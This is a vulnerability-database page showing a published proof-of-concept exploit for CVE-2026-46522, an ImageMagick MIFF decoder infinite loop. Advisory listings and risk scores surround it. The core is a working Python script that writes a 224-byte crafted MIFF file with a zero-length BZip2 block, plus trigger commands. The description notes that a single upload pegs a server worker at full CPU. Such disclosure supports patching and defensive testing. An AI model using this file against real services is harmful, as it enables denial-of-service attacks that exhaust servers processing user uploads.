Vulners
Lucene search
ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion
| Reporter | Title | Published | Views | Family All 79 |
|---|---|---|---|---|
 | Amazon Linux 2 : ImageMagick, --advisory ALAS2-2026-3346 (ALAS-2026-3346) | 8 Jun 202600:00 | – | nessus |
| Debian dla-4609 : imagemagick - security update | 30 May 202600:00 | – | nessus |
| Debian dsa-6298 : imagemagick - security update | 27 May 202600:00 | – | nessus |
| Debian dsa-6310 : imagemagick - security update | 30 May 202600:00 | – | nessus |
| Linux Distros Unpatched Vulnerability : CVE-2026-46522 | 22 May 202600:00 | – | nessus |
 | Medium: ImageMagick | 8 Jun 202600:00 | – | amazon |
| Medium: ImageMagick | 22 Jun 202600:00 | – | amazon |
 | CVE-2026-46522 | 10 Jun 202621:30 | – | alpinelinux |
 | CVE-2026-46522 | 11 Jun 202605:03 | – | circl |
 | ImageMagick security vulnerabilities | 29 May 202600:00 | – | cnnvd |
10
# Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion
# Google Dork: N/A
# Date: 2026-05-13
# Exploit Author: Jose Rivas (bl4cksku11) & Zero Trust Offsec
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/download/
# Version: ImageMagick 7.x, verified on 7.1.2-3 system
# CVE : CVE-2026-46522
# GHSA: https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7gg8-qqx7-92g5
"""
Description
-----------
coders/miff.c ReadMIFFImage BZip2 branch does not reject length=0 in the
per-block compressed length prefix. BZ2_bzDecompress with avail_in=0 returns
BZ_OK silently, and the IM loop only exits on BZ_STREAM_END or on codes that
are neither BZ_OK nor BZ_STREAM_END. The loop spins forever consuming CPU.
LZMA and Zip branches have the same code shape but their decompressor
libraries return BUF_ERROR on empty input, so they bail out.
Minimal PoC is 224 bytes. Single HTTP upload pegs a worker at 100 percent CPU
until killed by a request timeout or by the OS.
Usage
-----
python3 miff_bzip_dos.py [OUTPUT_PATH]
Default OUTPUT_PATH is /tmp/poc.miff. Then trigger:
/usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\
timeout 5 magick identify /tmp/poc.miff
Expected output:
Command exited with non-zero status 124
wall=5.00s user=5.00s cpu=100% exit=124
The process never finishes on its own. Timeout kills it.
"""
import sys
def craft_miff(path: str) -> None:
header = (
b"id=ImageMagick version=1.0\n"
b"class=DirectClass colors=0 alpha-trait=Undefined\n"
b"number-channels=3 number-meta-channels=0 channel-mask=0x0000000000000007\n"
b"columns=1 rows=1 depth=8\n"
b"colorspace=sRGB compression=BZip quality=75\n"
b"\x0c\n" # form feed terminator, then one byte consumed by ReadBlobByte
)
body = b"\x00\x00\x00\x00" # 4-byte MSB length=0, triggers the infinite loop
with open(path, "wb") as f:
f.write(header + body)
import os
print(f"[+] Wrote {path} ({os.path.getsize(path)} bytes)")
print(f"[+] Trigger with:")
print(f" /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\")
print(f" timeout 5 magick identify {path}")
if __name__ == "__main__":
craft_miff(sys.argv[1] if len(sys.argv) > 1 else "/tmp/poc.miff")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.01381
SSVC